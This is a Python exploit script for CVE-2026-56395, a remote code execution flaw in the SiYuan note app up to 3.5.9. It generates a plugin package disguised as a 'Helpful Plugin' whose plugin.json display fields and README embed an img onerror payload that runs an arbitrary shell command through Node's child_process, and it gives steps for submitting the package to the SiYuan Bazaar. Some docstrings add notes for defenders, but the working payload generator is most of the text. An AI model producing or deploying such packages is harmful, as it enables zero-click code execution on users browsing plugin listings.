#!/usr/bin/env python3
# Exploit Title: SiYuan <= 3.5.9 Remote Code Execution via Malicious Bazaar Package
# CVE: CVE-2026-56395
# Date: 2026-06-22
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/mbanyamer
# Author Blog : https://banyamersecurity.com/blog/
# Vendor Homepage: https://b3log.org/siyuan/
# Software Link: https://github.com/siyuan-note/siyuan
# Affected: SiYuan <= 3.5.9
# Tested on: SiYuan 3.5.x (Windows/macOS)
# Category: WebApps
# Platform: Electron
# Exploit Type: Remote Code Execution
# CVSS: 9.6
# Description: SiYuan is vulnerable to RCE via unsanitized Bazaar package metadata (displayName/description) and README.md. Zero-click when the Bazaar listing is rendered, one-click when the README is viewed.
# Fixed in: SiYuan 3.6.1+
# Usage:
# python3 exploit.py
#
# Examples:
# python3 exploit.py
#
# Options:
# --cmd Custom command to execute (default: calc.exe)
#
# Notes:
# • Generates a malicious plugin package ready for Bazaar submission
# • Works due to nodeIntegration in Electron
#
# How to Use
#
# Step 1:
# Run the script to generate the malicious package
#
# Step 2:
# Upload to GitHub and submit to SiYuan Bazaar
def banner():
    """Write the tool's ASCII-art banner to stdout.

    The art is kept in a raw string so the box-drawing characters are
    printed exactly as written; the output starts and ends with a newline.
    """
    art = r"""
╔██████╗ █████╗ ███╗ ██╗██╗ ██╗ █████╗ ███╗ ███╗███████╗██████╗╗
║██╔══██╗██╔══██╗████╗ ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██║
║██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗ ███████╔╝
║██╔══██╗██╔══██║██║╚██╗██║ ╚██╔╝ ██╔══██║██║╚██╔╝██║██╔══╝ ██╔══██╗
║██████╔╝██║ ██║██║ ╚████║ ██║ ██║ ██║██║ ╚═╝ ██║███████╗██║ ██║
╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
╔═╗ Banyamer Security ╔═╗
"""
    print(art)
import json
import os
import base64
from pathlib import Path
import sys
def create_malicious_package(output_dir="siyuan-poc-plugin", cmd="calc.exe"):
    """Write a SiYuan Bazaar plugin package whose metadata carries the PoC payload.

    Four files are written under ``output_dir``: ``plugin.json``, ``README.md``,
    ``icon.png`` and ``index.js``. The injection vector is ``cmd`` interpolated
    verbatim into an ``<img onerror=...>`` HTML fragment inside the
    ``displayName`` / ``description`` fields of ``plugin.json`` and inside
    ``README.md``. Per the file header, the fragment runs because the Electron
    UI renders these fields with nodeIntegration available, and the issue is
    fixed in SiYuan 3.6.1+.

    Defender notes: a Bazaar submission scanner can flag packages whose
    ``plugin.json`` display fields or README contain HTML event handlers
    (``onerror=``) or ``require('child_process')``; neither belongs in plugin
    metadata, and rendering these fields as text (or through an HTML
    sanitizer) removes the execution path.

    Args:
        output_dir: Directory to create the package in. Created if missing,
            but parent directories are not (``mkdir`` is called without
            ``parents=True``), so a nested, non-existent path raises
            ``FileNotFoundError``.
        cmd: Command string embedded verbatim in the payload fragment.

    Returns:
        None. Progress is reported on stdout.
    """
    base_dir = Path(output_dir)
    base_dir.mkdir(exist_ok=True)
    # Metadata that the Bazaar listing renders. Both localized "default" strings
    # carry the same HTML fragment, so the listing alone triggers it (the
    # "zero-click" path reported below).
    plugin_data = {
        "name": "poc-helpful-plugin",
        "displayName": {
            "default": f"Helpful Plugin <img src=x onerror=\"require('child_process').exec('{cmd}')\">"
        },
        "description": {
            "default": f"Useful plugin for productivity. <img src=x onerror=\"require('child_process').exec('{cmd}')\">"
        },
        "version": "1.0.0",
        "author": "poc-researcher",
        "authorLink": "https://example.com",
        "readme": "README.md",
        "icon": "icon.png",
        "keywords": ["poc", "demo"]
    }
    # ensure_ascii=False keeps non-ASCII characters literal instead of \u escapes.
    with open(base_dir / "plugin.json", "w", encoding="utf-8") as f:
        json.dump(plugin_data, f, indent=2, ensure_ascii=False)
    # README rendered on the "one-click" path; carries the same fragment.
    # The string body stays at column 0 so the Markdown is written unchanged.
    readme_content = f"""# Helpful Plugin
This plugin provides useful features.
<img src="x" onerror="require('child_process').exec('{cmd}')">
## Features
- Feature 1
- Feature 2
## Installation
1. Download
2. Install normally
**Proof of Concept for CVE-2026-56395**
"""
    with open(base_dir / "README.md", "w", encoding="utf-8") as f:
        f.write(readme_content)
    # Placeholder icon: a tiny base64-encoded PNG, present only because
    # plugin.json references "icon.png".
    icon_b64 = "iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mP8/5+hHgAHggJ/PchI7wAAAABJRU5ErkJggg=="
    with open(base_dir / "icon.png", "wb") as f:
        f.write(base64.b64decode(icon_b64))
    # Benign plugin entry point: it only logs on load. The PoC lives in the
    # metadata and README, not in the plugin code itself.
    index_js = """module.exports = {
onload() {
console.log("Malicious plugin loaded - PoC");
}
};"""
    with open(base_dir / "index.js", "w", encoding="utf-8") as f:
        f.write(index_js)
    print(f"[+] Malicious package created in: {base_dir.absolute()}")
    print("[+] Files: plugin.json (zero-click), README.md (one-click)")
    print(f"[*] Payload: {cmd}")
    print("[*] Upload to GitHub → Submit to SiYuan Bazaar")
def main():
    """Entry point: show the banner, read the optional command, build the package.

    The command is taken from the first positional argument (``sys.argv[1]``);
    the ``--cmd`` option mentioned in the file header is not parsed here.
    ``--help`` prints a one-line usage and exits with status 0. With no
    argument the default command ``calc.exe`` is used.
    """
    banner()
    args = sys.argv[1:]
    if args and args[0] == "--help":
        print("Usage: python3 exploit.py [command]")
        print("Example: python3 exploit.py \"whoami\"")
        sys.exit(0)
    cmd = args[0] if args else "calc.exe"
    create_malicious_package("siyuan-poc-plugin", cmd)
# Script guard: run only when executed directly, not when imported.
if __name__ == "__main__":
    main()